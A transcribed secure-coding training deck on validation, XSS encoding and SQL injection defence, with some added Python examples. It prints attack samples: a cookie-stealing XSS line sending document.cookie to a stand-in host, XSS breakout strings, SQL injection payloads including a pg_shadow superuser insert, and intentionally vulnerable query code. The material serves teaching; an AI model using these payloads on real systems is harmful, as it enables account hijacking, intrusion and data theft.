Approaching Secure Code: Where Do I Start?

Ebu class edgescan-2017

Page 1: Ebu class edgescan-2017

Approaching Secure Code: Where Do I Start?

Page 2: Ebu class edgescan-2017

Eoin Keary

CTO/Founder edgescan.com; OWASP Leader/Member; OWASP Ireland Founder

(ex)OWASP Global Board Member

@[email protected]

Page 3: Ebu class edgescan-2017

2016 – in review

• 83,000 impacted by breach at Gyft Inc
• 63,000 records exposed at UCF (Florida)
• 15,000 credit cards at Bailey's Inc.
• Hyatt data breach: 250 hotels in 50 countries
• Neiman Marcus – 5,200 accounts
• TaxSlayer – 8,800 customers
• Yahoo – 500,000,000 accounts

Globally, every second, 18 adults become victims of cybercrime - Symantec

“The loss of industrial information and intellectual property through cyber espionage constitutes the greatest transfer of wealth in history” - Keith Alexander

“One hundred BILLION dollars” - Dr Evil

Eoin, I didn’t click it – My Mum

Page 4: Ebu class edgescan-2017

Two weeks of ethical hacking

Ten man-years of development

Business Logic Flaws

Code Flaws / Security Errors

An inconvenient truth

Page 5: Ebu class edgescan-2017

Agile Risk Model

Fail Early – Fail Often: “Push Left”

Page 6: Ebu class edgescan-2017

Make this more difficult: let's change the application code once a month.

Continuous Testing:

Page 7: Ebu class edgescan-2017

Full Stack Security

• Web Applications
• App Server
• SSL/TLS
• Databases
• Services
• Operating Systems
• Networks

Page 8: Ebu class edgescan-2017


Secure Development…

Lifecycle stages: Requirements and use cases → Design → Test plans → Code → Test results → Field feedback

Security touchpoints applied at each stage (iterative approach):
• Security requirements
• Risk analysis
• Design review
• Risk-based security tests
• Static analysis (tools)
• Code review
• Penetration testing

Risk = Threat x Vulnerability

What do we need to test, and how? Code review tools

Page 9: Ebu class edgescan-2017

GDPR (EU Regulation):

The General Data Protection Regulation (GDPR) (Regulation (EU) 2016/679) is a Regulation by which the European Commission intends to strengthen and unify data protection for individuals within the European Union (EU).

• A fine of up to 20,000,000 EUR or up to 4% of the annual worldwide turnover of the preceding financial year in the case of an enterprise, whichever is greater (Article 83, Paragraphs 5 & 6)

Box ticking

Page 10: Ebu class edgescan-2017

So…
• What are we protecting against?
• Which security bugs do we spend time fixing first?
• Continuous security
• Start early (design securely)

Let's dig a little deeper…

Page 11: Ebu class edgescan-2017

Some Stats

Based on thousands of continuous assessments using edgescan.com

Host, web server and web application were all assessed.

Page 12: Ebu class edgescan-2017

Vulnerability Breakdown

Critical   1%
High      14%
Medium    17%
Low       24%
Minimal   44%

Risk Density

15% of assets had a high or critical risk vulnerability

Page 13: Ebu class edgescan-2017

Most Common Vulnerability

Browser Attacks        61%
Cryptography           17%
Session Management      9%
Injection Attacks       4%
Authorisation           4%
Information Leakage     3%
Insecure Deployment     1%
Availability            1%

Application Layer: Browser Attacks (61%) broken down

XSS                    91%
CSRF                    5%
Open Redirection        1%
HTML Injection          1%
Response Splitting      1%
DOM Vulnerabilities     1%

Page 14: Ebu class edgescan-2017

Risk Dispersion

                Critical Risk   High Risk
Application     95%             82%
Network          5%             18%

Page 15: Ebu class edgescan-2017

Oldest Critical Vulnerabilities

Oldest “known” vulnerabilities discovered in 2016 by edgescan:
• CVE-2007-6420 - Cross-site request forgery (CSRF)
• CVE-2007-3847 - Apache 2.3.0 DoS
• CVE-2007-5000 - Apache HTTP Server XSS
• CVE-2007-6388 - Apache HTTP Server XSS

9-year-old vulnerabilities exist in the wild on live servers. Poor or non-existent patching is the major root cause.

Good news: the frequency of occurrence is between 1.5% and 3%.

What else happened in 2007? The first iPhone was launched…

Page 16: Ebu class edgescan-2017

GET vs POST HTTP Request

GET request:

    GET /search.jsp?name=blah&type=1 HTTP/1.0
    User-Agent: Mozilla/4.0
    Host: www.mywebsite.com
    Referer: www.jimslamps.com/login?user=jim&pass=w0rDup
    Cookie: SESSIONID=2KDSU72H9GSA289
    <CRLF>

POST request:

    POST /search.jsp HTTP/1.0
    User-Agent: Mozilla/4.0
    Host: www.mywebsite.com
    Content-Length: 16
    Cookie: SESSIONID=2KDSU72H9GSA289
    <CRLF>
    name=blah&type=1
    <CRLF>

Page 17: Ebu class edgescan-2017

GET request:

    GET /search.jsp?name=blah&type=1 HTTP/1.0
    User-Agent: Mozilla/4.0
    Host: www.mywebsite.com
    Cookie: SESSIONID=2KDSU72H9GSA289
    <CRLF>

POST request:

    POST /search.jsp HTTP/1.0
    User-Agent: Mozilla/4.0
    Host: www.mywebsite.com
    Content-Length: 16
    Cookie: SESSIONID=2KDSU72H9GSA289
    <CRLF>
    name=blah&type=1
    <CRLF>

GET requests:
• Can be bookmarked
• Logged on the server
• Kept in browser history
• Cached
• Easier to attack*

POST requests:
• Data in the HTTP body
• Not logged on the server
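To make the GET/POST difference concrete, here is an added example (not from the deck) that parses the two requests shown above and reconstructs what a typical access log would record for each: the request line, which carries GET parameters but never the POST body. The request bytes are constructed from the slide; the access-log format is an assumption.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed from the deck's slides: the same search submitted as GET and as POST.
GET_REQUEST = (
    b"GET /search.jsp?name=blah&type=1 HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.0\r\n"
    b"Host: www.mywebsite.com\r\n"
    b"Referer: www.jimslamps.com/login?user=jim&pass=w0rDup\r\n"
    b"Cookie: SESSIONID=2KDSU72H9GSA289\r\n"
    b"\r\n"
)
POST_REQUEST = (
    b"POST /search.jsp HTTP/1.0\r\n"
    b"User-Agent: Mozilla/4.0\r\n"
    b"Host: www.mywebsite.com\r\n"
    b"Content-Length: 16\r\n"
    b"Cookie: SESSIONID=2KDSU72H9GSA289\r\n"
    b"\r\n"
    b"name=blah&type=1\r\n"
)


def parse_request(raw: bytes) -> dict:
    """Split a raw HTTP/1.x request into method, path, headers and parameters."""
    head, _, body = raw.partition(b"\r\n\r\n")        # headers end at the blank line
    lines = head.decode("iso-8859-1").split("\r\n")
    method, target, version = lines[0].split(" ", 2)

    headers = {}
    for line in lines[1:]:
        # Headers are colon-separated name/value pairs; names are case-insensitive.
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()

    parts = urlsplit(target)
    params = parse_qs(parts.query)                     # GET data travels in the URL
    if method == "POST":
        # POST data travels in the body; only Content-Length bytes belong to it.
        length = int(headers.get("content-length", "0"))
        params.update(parse_qs(body[:length].decode("iso-8859-1")))

    # Assumed log format: what a server typically writes per request. The full
    # target (including any query string) is recorded; the body is not.
    access_log_line = f'{headers.get("host", "-")} "{method} {target} {version}"'
    return {
        "method": method,
        "path": parts.path,
        "headers": headers,
        "params": params,
        "access_log_line": access_log_line,
    }
```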

Page 18: Ebu class edgescan-2017

What are HTTP Headers?

HTTP headers are components of the message header of HTTP requests and responses. HTTP headers define different aspects of an HTTP transaction. HTTP headers are colon-separated name-value pairs in clear-text string format, terminated by a carriage return (CR) and line feed (LF) character sequence.

http://en.wikipedia.org/wiki/List_of_HTTP_header_fields

Page 19: Ebu class edgescan-2017

HTTP Request Headers, Examples

    Authorization: Basic QWxhZGRpbjpvcGVuIHNlc2FtZQ==
    Accept: text/plain
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0

Page 20: Ebu class edgescan-2017

Security HTTP Response Headers

Page 21: Ebu class edgescan-2017

Data Validation

Input that is not directly entered by the user is typically less prone to validation.

Attacks discussed in this section apply to external input from any client-side source:
• Standard form input controls
• Read-only HTML form controls (drop-down lists, radio buttons, hidden fields, etc.)
• HTTP cookie values
• HTTP headers
• Embedded URL parameters (e.g., in the GET request)

Page 22: Ebu class edgescan-2017

Data Validation

Data validation is typically done using one of three basic approaches:
• Known Bad
• Known Good
• Exact Match

All input must be properly validated on the server (not the client) to ensure that malicious data is not accepted and processed by the application.

Page 23: Ebu class edgescan-2017

Exact Match Validation

Data is validated against a list of explicit known values.

Application footprint or “application attack surface” defined.

Provides the strongest level of protection against malicious data. Often not feasible when a large number of possible good values are expected.

May require code modification any time input values are changed or updated.

Example: acceptable input is yes or no

    if ($input eq "yes" or $input eq "no")

Page 24: Ebu class edgescan-2017

Exact Match Validation Example

Validates the variable gender against 2 known values (Java):

    static boolean validateGender(String gender) {
        if (gender.equals("Female"))
            return true;
        else if (gender.equals("Male"))
            return true;
        else
            return false;
    }

Page 25: Ebu class edgescan-2017

Known Good Validation

Often called “white list” validation.

Data is validated against a list of allowable characters.

Typically implemented using regular expressions to match known good data patterns. Data type cast/convert functions can be used to verify data conforms to a certain data type (i.e. Int32). Expected input character values must be clearly defined for each input variable.

Care must be taken if complex regular expressions are used.

A common mistake is to forget to anchor the expression with ^ and $.

Page 26: Ebu class edgescan-2017

Regular Expressions

“Regular expression” is a term used to refer to a pattern-matching technology for processing text.

Although there is no standards body governing the regular expression language, Perl 5, by virtue of its popularity, has set the standard for regular expression syntax. A regular expression itself is a string that represents a pattern, encoded using the regular expression language and syntax.

Page 27: Ebu class edgescan-2017

Data Validation Techniques

Validates against a regular expression representing the proper expected data format (10 alphanumeric characters) (.NET):

    using System.Text.RegularExpressions;

    static bool validateUserFormat(string userName) {
        bool isValid = false; // Fail by default
        // Verify that the UserName is exactly 10 alphanumeric characters
        isValid = Regex.IsMatch(userName, @"^[A-Za-z0-9]{10}$");
        return isValid;
    }

Page 28: Ebu class edgescan-2017

Regular Expression - Zend

    $validator = new Zend_Validate_Regex(array('pattern' => '/^Test/'));
    $validator->isValid("Test");    // returns true
    $validator->isValid("Testing"); // returns true
    $validator->isValid("Pest");    // returns false

Page 29: Ebu class edgescan-2017

Known Bad Validation

Often called “black list” validation.

Data is validated against a list of characters that are deemed to be dangerous or unacceptable.

Useful for preventing specific characters from being accepted by the application. Provides the weakest method of validation against malicious data. Susceptible to bypass using various forms of character encoding.

Example: validating entry into a generic text field

    if ($input !~ /[\r\t\n><();\\+&%'"*\|]/)

Page 30: Ebu class edgescan-2017

Known Bad Validation Example

Validates against a regular expression of known bad input strings (.NET):

    using System.Text.RegularExpressions;

    static bool checkMessage(string messageText) {
        bool isValid = false; // Fail by default
        // Verify input doesn't contain any < or >
        isValid = !Regex.IsMatch(messageText, @"[><]");
        return isValid;
    }
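The three approaches side by side, as an added Python example (not code from the deck): exact match, the deck's "exactly 10 alphanumerics" known-good rule with and without anchors, and the known-bad "<>" check applied before and after the percent-decoding a later layer would perform. It also shows a subtlety the anchoring advice hides: in Python, Perl and PCRE, `$` still matches before a trailing newline, so fullmatch() is the safer anchor.

```python
import re
from urllib.parse import unquote


# Exact match: the strongest approach, usable when the set of good values is small.
def validate_gender(gender: str) -> bool:
    return gender in ("Female", "Male")


# Known good: the deck's "exactly 10 alphanumeric characters" rule, three ways.
def validate_user_format(user_name: str) -> bool:
    # fullmatch() succeeds only if the whole string matches: no prefix, no suffix
    # and no trailing newline.
    return re.fullmatch(r"[A-Za-z0-9]{10}", user_name) is not None


def validate_user_format_unanchored(user_name: str) -> bool:
    # The common mistake: without ^ and $ the pattern may match anywhere inside
    # the input, so ten good characters followed by anything at all pass.
    return re.search(r"[A-Za-z0-9]{10}", user_name) is not None


def validate_user_format_dollar(user_name: str) -> bool:
    # Anchored with ^ and $, but "$" also matches just before a final "\n",
    # so "abcdefghij\n" is accepted even though it is 11 characters long.
    return re.match(r"^[A-Za-z0-9]{10}$", user_name) is not None


# Known bad: reject anything containing "<" or ">".
def check_message(message_text: str) -> bool:
    return re.search(r"[><]", message_text) is None


def check_message_after_decoding(message_text: str) -> bool:
    # A deny list only helps if it sees the same bytes the consumer sees. Here the
    # check runs after the percent-decoding a later layer performs; "%3C" passes
    # check_message() unchanged but is "<" by the time it reaches the page.
    return check_message(unquote(message_text))
```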

Page 31: Ebu class edgescan-2017

Bounds Checking

All external input must also be properly validated to ensure that excessively large input is rejected.

• Length checking: a maximum length check should be performed on all incoming application data. Input that exceeds the appropriate length or size limits must be rejected and not processed by the application.
• Size checking: a maximum size check should be performed on all incoming data files.

Page 32: Ebu class edgescan-2017

Bounds Checking – Example

Unbounded reading of a file

The following code reads a String from a file. Because it uses the readLine() method, it will read an unbounded amount of input until a <newline> (\n) character is read.

    InputStream input = inputfileFile.getInputStream(entry);
    Reader inpReader = new InputStreamReader(input);
    BufferedReader br = new BufferedReader(inpReader);
    String line = br.readLine();

This could be taken advantage of to cause an OutOfMemoryError, or to consume a large amount of memory, which affects performance and initiates costly garbage collection routines.
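A bounded counterpart to the readLine() call above, as an added Python example (not from the deck): the reader stops after a fixed number of bytes whether or not a newline has arrived, and rejects the line instead of buffering it. The 1024-byte limit and the upload size bounds are assumed values.

```python
import io

MAX_LINE_BYTES = 1024  # assumed application limit for one line of input


class LineTooLong(ValueError):
    """Raised instead of buffering an over-long line."""


def read_bounded_line(stream, limit: int = MAX_LINE_BYTES) -> bytes:
    """Read one line from a binary stream without ever holding more than
    limit + 2 bytes of it in memory."""
    # readline(n) returns after at most n bytes even if no newline has arrived,
    # unlike BufferedReader.readLine(), which keeps buffering until it sees "\n".
    # Two extra bytes leave room for a CRLF terminator on a line of exactly
    # `limit` bytes.
    chunk = stream.readline(limit + 2)
    if not chunk.endswith(b"\n") and len(chunk) > limit:
        raise LineTooLong(f"no line terminator within {limit} bytes")
    line = chunk.rstrip(b"\r\n")
    if len(line) > limit:
        raise LineTooLong(f"line of {len(line)} bytes exceeds {limit}")
    return line


def line_accepted(data: bytes, limit: int = MAX_LINE_BYTES) -> bool:
    """True when the first line of `data` is within bounds, False when it
    would have been rejected (wrapper used by the checks below)."""
    try:
        read_bounded_line(io.BytesIO(data), limit)
        return True
    except LineTooLong:
        return False


def check_upload_size(data: bytes, minimum: int = 10 * 1024,
                      maximum: int = 4 * 1024 * 1024) -> bool:
    """File-size check with assumed 10 kB / 4 MB bounds, the same intent as the
    deck's Zend FilesSize validator."""
    return minimum <= len(data) <= maximum


# Constructed inputs: a normal line, and a 5000-byte "line" with no terminator.
NORMAL = b"name=blah&type=1\r\nrest of file"
NO_NEWLINE = b"x" * 5000
```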

Page 33: Ebu class edgescan-2017

Bounds checking

    $validator = new Zend_Validate_StringLength(array('max' => 6));
    $validator->isValid("Test");    // returns true
    $validator->isValid("Testing"); // returns false

Page 34: Ebu class edgescan-2017

Bounds checking – File size

    $upload = new Zend_File_Transfer();

    // Limit the size of all files to be uploaded to 40000 bytes
    $upload->addValidator('FilesSize', false, 40000);

    // Limit the size of all files to be uploaded to a maximum of 4MB and a minimum of 10kB
    $upload->addValidator('FilesSize', false, array('min' => '10kB', 'max' => '4MB'));

Page 35: Ebu class edgescan-2017

PS

Oh, yes… validation needs to be performed on the server side.

Validation is also important on the client side, and so is output encoding… More later.

Page 36: Ebu class edgescan-2017

Cross Site Scripting

JavaScript Injection

Page 37: Ebu class edgescan-2017

<

Page 38: Ebu class edgescan-2017

&lt;

Page 39: Ebu class edgescan-2017

Output Encoding

Safe ways to represent dangerous characters in a web page:

Character                   Decimal   Hexadecimal   HTML Entity   Unicode
" (double quotation mark)   &#34;     &#x22;        &quot;        \u0022
' (single quotation mark)   &#39;     &#x27;        &apos;        \u0027
& (ampersand)               &#38;     &#x26;        &amp;         \u0026
< (less than)               &#60;     &#x3C;        &lt;          \u003c
> (greater than)            &#62;     &#x3E;        &gt;          \u003e

Page 40: Ebu class edgescan-2017

XSS Attack Payloads
– Session Hijacking
– Site Defacement
– Network Scanning
– Undermining CSRF Defenses
– Site Redirection/Phishing
– Load of Remotely Hosted Scripts
– Data Theft
– Keystroke Logging
– Attackers are using XSS more frequently

Page 41: Ebu class edgescan-2017

Anatomy of a XSS Attack (bad stuff)

    <script>window.location='https://evileoin.com/unc/data=' + document.cookie;</script>

    <script>document.body.innerHTML='<blink>EOIN IS COOL</blink>';</script>

Page 42: Ebu class edgescan-2017

Anatomy of a XSS Attack (bad stuff)

    <html><body><?php print "Not found: " . urldecode($_SERVER["REQUEST_URI"]); ?></body></html>

Request:  http://testsite.test/file_which_not_exist
Response: Not found: /file_which_not_exist

Request:  http://testsite.test/<script>alert("TEST");</script>
Response: Not found: / (but with the JavaScript code <script>alert("TEST");</script> reflected into the page)

Page 43: Ebu class edgescan-2017

XSS Defense by Data Type and Context

Data Type             Context             Defense
String                HTML Body           HTML Entity Encode
String                HTML Attribute      Minimal Attribute Encoding
String                GET Parameter       URL Encoding
String                Untrusted URL       URL Validation, avoid javascript: URLs, Attribute encoding, safe URL verification
String                CSS                 Strict structural validation, CSS Hex encoding, good design
HTML                  HTML Body           HTML Validation (JSoup, AntiSamy, HTML Sanitizer)
Any                   DOM                 DOM XSS Cheat Sheet
Untrusted JavaScript  Any                 Sandboxing (Google Caja)
JSON                  Client Parse Time   JSON.parse() or json2.js

Safe HTML attributes include: align, alink, alt, bgcolor, border, cellpadding, cellspacing, class, color, cols, colspan, coords, dir, face, height, hspace, ismap, lang, marginheight, marginwidth, multiple, nohref, noresize, noshade, nowrap, ref, rel, rev, rows, rowspan, scrolling, shape, span, summary, tabindex, title, usemap, valign, value, vlink, vspace, width

Page 44: Ebu class edgescan-2017

HTML Encoding: certain sets of characters mean something special in HTML. For instance ‘<’ is used to open an HTML tag and ‘&’ is used to mark the beginning of a sequence of characters that defines a special symbol like the copyright symbol. (htmlentities in PHP)

    HttpUtility.HtmlEncode("<script>alert('&');</script>")
    &lt;script&gt;alert(&#39;&amp;&#39;);&lt;/script&gt;

Attribute Encoding: attribute encoding replaces three characters that are not valid to use inside attribute values in HTML. Those characters are ampersand ‘&’, less-than ‘<’, and quotation marks ‘"’.

    HttpUtility.HtmlAttributeEncode("<script>alert(\"&\");</script>")
    &lt;script>alert(&quot;&amp;&quot;);&lt;/script>

URL Encoding: URL encoding is used when you have some data that you would like to pass in the URL and that data contains some reserved or invalid characters (&, /, <space>). (urlencode() in PHP)

    HttpUtility.UrlEncode("Some Special Information / That needs to be in the URL")
    Some+Special+Information+%2f+That+needs+to+be+in+the+URL
    OR
    Some%20Special%20Information%20%2f%20That%20needs%20to%20be%20in%20the%20URL
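The per-context encoders from the table and the three HttpUtility calls above, as an added Python example (not from the deck or any of the libraries it names). It reproduces the HtmlEncode and HtmlAttributeEncode outputs shown, adds a JavaScript-string encoder and a URL-scheme check for the href/src context, and shows the GET-parameter context needing URL encoding followed by attribute encoding. The `render_search_link` template is an assumption.

```python
from urllib.parse import quote_plus, urlsplit

# Entities taken from the deck's table of safe representations.
HTML_BODY = {"&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&#34;", "'": "&#39;"}
# Minimal attribute encoding: the three characters that can break out of a quoted value.
HTML_ATTR = {"&": "&amp;", "<": "&lt;", '"': "&quot;"}


def encode_for_html(data: str) -> str:
    """HTML body context: <span>DATA</span>."""
    return "".join(HTML_BODY.get(c, c) for c in data)


def encode_for_html_attribute(data: str) -> str:
    """Double-quoted HTML attribute context: <input value="DATA">."""
    return "".join(HTML_ATTR.get(c, c) for c in data)


def encode_for_url_parameter(data: str) -> str:
    """GET parameter context: /site/search?value=DATA (spaces become '+')."""
    return quote_plus(data)


def encode_for_javascript(data: str) -> str:
    """JavaScript string context: var v='DATA'. Everything except ASCII letters
    and digits becomes \\xHH (or \\uHHHH), so quotes, ')' and ';' cannot end
    the string literal or the statement."""
    out = []
    for c in data:
        if c.isascii() and c.isalnum():
            out.append(c)
        elif ord(c) < 256:
            out.append("\\x%02X" % ord(c))
        else:
            out.append("\\u%04X" % ord(c))
    return "".join(out)


def safe_url(data: str):
    """URL context (href/src): encoding does not help here, because a
    javascript: URL is valid attribute text. Allow only http(s) URLs."""
    scheme = urlsplit(data.strip()).scheme.lower()
    return data if scheme in ("http", "https") else None


def render_search_link(value: str) -> str:
    """GET parameter inside an href: URL-encode the value for the query string,
    then attribute-encode the whole URL because it sits inside an attribute."""
    url = "/site/search?value=" + encode_for_url_parameter(value)
    return '<a href="' + encode_for_html_attribute(url) + '">clickme</a>'
```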

Page 45: Ebu class edgescan-2017

Where can it go wrong?

Page 46: Ebu class edgescan-2017

HTML Body Context

<span>UNTRUSTED DATA</span>

attack <script>/* bad stuff */</script>

Page 47: Ebu class edgescan-2017

HTML Attribute Context

<input type="text" name="fname" value="UNTRUSTED DATA">

attack: "><script>/* bad stuff */</script>

Page 48: Ebu class edgescan-2017

HTTP GET Parameter Context

    <a href="/site/search?value=UNTRUSTED DATA">clickme</a>

attack: " onclick="/* bad stuff */"

Page 49: Ebu class edgescan-2017

URL Context

<a href="UNTRUSTED URL">clickme</a>

<iframe src="UNTRUSTED URL" />

attack: javascript:/* BAD STUFF */

Page 50: Ebu class edgescan-2017

CSS Value Context

<div style="width: UNTRUSTED DATA;">Selection</div>

attack: expression(/* BAD STUFF */)

Page 51: Ebu class edgescan-2017

JavaScript Variable Context

<script>var currentValue='UNTRUSTED DATA';</script>

<script>someFunction('UNTRUSTED DATA'); </script>

attack: ');/* BAD STUFF */

Page 52: Ebu class edgescan-2017

JSON Parsing Context

JSON.parse(UNTRUSTED JSON DATA)

Page 53: Ebu class edgescan-2017

Solving Real World XSS Problems in Java with OWASP Libraries

Page 54: Ebu class edgescan-2017

The Problem: a web page built in Java JSP is vulnerable to XSS

The Solution:

    <input type="text" name="data" value="<%= Encode.forHtmlAttribute(dataValue) %>" />

    <textarea name="text"><%= Encode.forHtmlContent(textValue) %></textarea>

    <button onclick="alert('<%= Encode.forJavaScriptAttribute(alertMsg) %>');">click me</button>

    <script type="text/javascript">var msg = "<%= Encode.forJavaScriptBlock(message) %>"; alert(msg);</script>

OWASP Java Encoder Project
https://www.owasp.org/index.php/OWASP_Java_Encoder_Project

Page 55: Ebu class edgescan-2017

OWASP HTML Sanitizer Project
https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project

Page 56: Ebu class edgescan-2017

Solving Real World Problems with the OWASP HTML Sanitizer Project

The Problem: a web page is vulnerable to XSS because of untrusted HTML

The Solution:

    PolicyFactory policy = new HtmlPolicyBuilder()
        .allowElements("a")
        .allowUrlProtocols("https")
        .allowAttributes("href").onElements("a")
        .requireRelNofollowOnLinks()
        .build();
    String safeHTML = policy.sanitize(untrustedHTML);

Page 57: Ebu class edgescan-2017

OWASP JSON Sanitizer Project
https://www.owasp.org/index.php/OWASP_JSON_Sanitizer

• Given JSON-like content, converts it to valid JSON.
• This can be attached at either end of a data pipeline to help satisfy Postel's principle: be conservative in what you do, be liberal in what you accept from others.
• Applied to JSON-like content from others, it will produce well-formed JSON that should satisfy any parser you use.
• Applied to your output before you send, it will coerce minor mistakes in encoding and make it easier to embed your JSON in HTML and XML.

Page 58: Ebu class edgescan-2017

Solving Real World Problems with the OWASP JSON Sanitizer Project

The Problem: a web page is vulnerable to XSS because it parses untrusted JSON incorrectly

The Solution: JSON Sanitizer can help with two use cases.

1) Sanitizing untrusted JSON on the server that is submitted from the browser in standard AJAX communication

2) Sanitizing potentially untrusted JSON server-side before sending it to the browser. The output is a valid JavaScript expression, so it can be parsed by JavaScript's eval or by JSON.parse.

Page 59: Ebu class edgescan-2017

SAFE use of jQuery:   $('#element').text(UNTRUSTED DATA);

UNSAFE use of jQuery: $('#element').html(UNTRUSTED DATA);

Page 60: Ebu class edgescan-2017

jQuery methods that directly update the DOM or can execute JavaScript:

$() or jQuery(), .attr(), .add(), .css(), .after(), .html(), .animate(), .insertAfter(), .append(), .insertBefore(), .appendTo()

Dangerous jQuery 1.7.2 data types: CSS, some attribute settings, HTML, URL (potential redirect)

jQuery methods that accept URLs to potentially unsafe content:

jQuery.ajax(), jQuery.post(), jQuery.get(), load(), jQuery.getScript()

Page 61: Ebu class edgescan-2017

Injection Flaws

Page 62: Ebu class edgescan-2017

';

Page 63: Ebu class edgescan-2017

Anatomy of a SQL Injection Attack

    Select * from user where username='uid' and password = 'password'

uid = "EoinKeary"
password = "Password123!"

    Select * from user where username='EoinKeary' and password = 'Password123!'

uid = "EoinKeary"
password = "' OR 1=1;--"

    Select * from user where username='EoinKeary' and password = '' OR 1=1;--'

Page 64: Ebu class edgescan-2017

Anatomy of a SQL Injection Attack

    public void bad(HttpServletRequest request, HttpServletResponse response) throws Throwable {
        String data;
        Logger log_bad = Logger.getLogger("local-logger");

        /* read parameter from request */
        data = request.getParameter("name");                  // Input from request (Source)

        Logger log2 = Logger.getLogger("local-logger");
        Connection conn_tmp2 = null;
        Statement sqlstatement = null;
        ResultSet sqlrs = null;
        try {
            conn_tmp2 = IO.getDBConnection();
            sqlstatement = conn_tmp2.createStatement();
            /* take user input and place into dynamic sql query */
            sqlrs = sqlstatement.executeQuery("select * from users where name='" + data + "'");  // Exploit is executed (Sink)
            IO.writeString(sqlrs.toString());
        } catch (SQLException se) {
            // catch body not shown on the slide
        }
    }

Page 65: Ebu class edgescan-2017

String Building to Call Stored Procedures

String building can be done when calling stored procedures as well:

    sql = "GetCustInfo @LastName=" + request.getParameter("LastName");

Stored procedure code (wrapped dynamic SQL):

    CREATE PROCEDURE GetCustInfo (@LastName VARCHAR(100)) AS
    exec('SELECT * FROM CUSTOMER WHERE LNAME=''' + @LastName + '''')
    GO

What's the issue here? If blah' OR '1'='1 is passed in as the LastName value, the entire table will be returned.

Remember: stored procedures need to be implemented safely. 'Implemented safely' means the stored procedure does not include any unsafe dynamic SQL generation.

Anatomy of a SQL Injection Attack

Page 66: Ebu class edgescan-2017

SQL Injection Attack Techniques

Boolean-based blind SQL injection:
    par=1 AND ORD(MID((SQL query), Nth char, 1)) > Bisection num--

UNION query (in-band) SQL injection:
    par=1 UNION ALL SELECT query--

Batched queries SQL injection:
    par=1; SQL query;--

Page 67: Ebu class edgescan-2017

Commands to access Oracle Databases.

Many applications run an “admin” account when using the database.

With SQL injection we can access the DB as an admin user.

Total Control…

Page 68: Ebu class edgescan-2017

Query Parameterization (PHP)

    $stmt = $dbh->prepare("update users set email=:new_email where id=:user_id");
    $stmt->bindParam(':new_email', $email);
    $stmt->bindParam(':user_id', $id);

Page 69: Ebu class edgescan-2017

Query Parameterization (.NET)

    SqlConnection objConnection = new SqlConnection(_ConnectionString);
    objConnection.Open();
    SqlCommand objCommand = new SqlCommand(
        "SELECT * FROM User WHERE Name = @Name AND Password = @Password", objConnection);
    objCommand.Parameters.AddWithValue("@Name", NameTextBox.Text);
    objCommand.Parameters.AddWithValue("@Password", PassTextBox.Text);
    SqlDataReader objReader = objCommand.ExecuteReader();

Page 70: Ebu class edgescan-2017

Query Parameterization (Java)

    String newName = request.getParameter("newName");
    String id = request.getParameter("id");

    // SQL
    PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES SET NAME = ? WHERE ID = ?");
    pstmt.setString(1, newName);
    pstmt.setString(2, id);

    // HQL
    Query safeHQLQuery = session.createQuery("from Employees where id=:empId");
    safeHQLQuery.setParameter("empId", id);

Page 71: Ebu class edgescan-2017

Query Parameterization (ColdFusion)

    <cfquery name="getFirst" dataSource="cfsnippets">
        SELECT * FROM #strDatabasePrefix#_courses
        WHERE intCourseID = <cfqueryparam value=#intCourseID# CFSQLType="CF_SQL_INTEGER">
    </cfquery>

Page 72: Ebu class edgescan-2017

Query Parameterization (Perl)

    my $sql = "INSERT INTO foo (bar, baz) VALUES ( ?, ? )";
    my $sth = $dbh->prepare( $sql );
    $sth->execute( $bar, $baz );

Page 73: Ebu class edgescan-2017

Automatic Query Parameterization (.NET LINQ to SQL)

    public bool login(string loginId, string shrPass) {
        DataClassesDataContext db = new DataClassesDataContext();
        var validUsers = from user in db.USER_PROFILE
                         where user.LOGIN_ID == loginId && user.PASSWORDH == shrPass
                         select user;
        if (validUsers.Count() > 0) return true;
        return false;
    }
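The login query from "Anatomy of a SQL Injection Attack" run both ways, as an added Python example (not from the deck) against an in-memory SQLite table: string building lets the `' OR '1'='1` value from the stored-procedure slide match every row, while the parameterized query treats it as a password that matches nothing. The table contents are constructed; plaintext passwords are kept only so the query matches the slide's.

```python
import sqlite3


def make_demo_db() -> sqlite3.Connection:
    # Constructed sample data. Plaintext passwords only to mirror the deck's query;
    # a real system stores salted, slow hashes (see Secure Password Storage).
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (username TEXT, password TEXT)")
    conn.execute("INSERT INTO user VALUES ('EoinKeary', 'Password123!')")
    conn.execute("INSERT INTO user VALUES ('alice', 'Hunter2!')")
    return conn


def login_vulnerable(conn, uid: str, password: str):
    # String building: the deck's query with the values spliced into the SQL text,
    # so quote characters in the input become part of the statement.
    query = ("Select * from user where username='" + uid +
             "' and password = '" + password + "'")
    return conn.execute(query).fetchall()


def login_parameterized(conn, uid: str, password: str):
    # Query parameterization: the SQL text is fixed and the values are bound as
    # data, so a quote in the input is just a character inside a string value.
    query = "Select * from user where username=? and password = ?"
    return conn.execute(query, (uid, password)).fetchall()


def run_demo() -> dict:
    conn = make_demo_db()
    good = ("EoinKeary", "Password123!")
    # The deck's stored-procedure payload; the built query ends as
    #   ... and password = '' OR '1'='1'
    # and "OR '1'='1'" is true for every row.
    forged = ("EoinKeary", "' OR '1'='1")
    return {
        "vulnerable_with_real_password": len(login_vulnerable(conn, *good)),
        "vulnerable_with_injection": len(login_vulnerable(conn, *forged)),
        "parameterized_with_real_password": len(login_parameterized(conn, *good)),
        "parameterized_with_injection": len(login_parameterized(conn, *forged)),
    }
```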

Page 74: Ebu class edgescan-2017

Code Review - Find the Vulns!

    <?php
    $offset = $argv[0];
    $query = "SELECT id, name FROM products ORDER BY name LIMIT 20 OFFSET $offset;";
    $result = pg_query($conn, $query);
    ?>

$offset is intended to be an integer passed via an HTTP request.

How about this?

    0; insert into pg_shadow(usename,usesysid,usesuper,usecatupd,passwd) select 'crack', usesysid, 't','t','crack' from pg_shadow where usename='postgres'; --

Page 75: Ebu class edgescan-2017

Code Review - Find the Vulns!

    <?php
    $prod = $_GET["prod"];
    $query = "SELECT * FROM products WHERE id LIKE '%$prod%'";
    $result = mssql_query($query);
    ?>

The developer intends a product from a listbox control, e.g. TV, Radio, Banana, Nail.

